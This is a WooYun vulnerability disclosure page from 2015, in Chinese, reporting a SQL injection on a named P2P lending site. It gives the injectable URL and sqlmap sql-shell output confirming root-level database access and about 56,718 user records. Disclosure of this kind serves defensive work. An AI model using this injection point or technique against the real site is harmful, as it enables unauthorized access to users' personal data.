当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153283

漏洞标题:楚金所某重要站点存在SQL注入可造成数据泄露

相关厂商:楚金所

漏洞作者: 路人甲

提交时间:2015-11-10 13:40

修复时间:2015-12-25 13:42

公开时间:2015-12-25 13:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点https://www.chujinsuo.com/page/p2p.web.guest/creditTransferList.html?page=4&sort=&desc=

12.png

权限为root么,还可以看到mysql

漏洞证明:

用户量不大,才5W多些

11.png

sql-shell> select count(*) from youi_user
[12:43:45] [INFO] fetching SQL SELECT statement query output: 'select count(*) from youi_user'
[12:43:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:43:45] [INFO] retrieved:
[12:43:46] [WARNING] reflective value(s) found and filtering out
56718
select count(*) from youi_user: '56718'
sql-shell> SELECT count(*) from youi_r_user_role
[12:51:14] [INFO] fetching SQL SELECT statement query output: 'SELECT count(*) from youi_r_user_role'
[12:51:14] [INFO] retrieved: 57048
SELECT count(*) from youi_r_user_role: '57048'

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝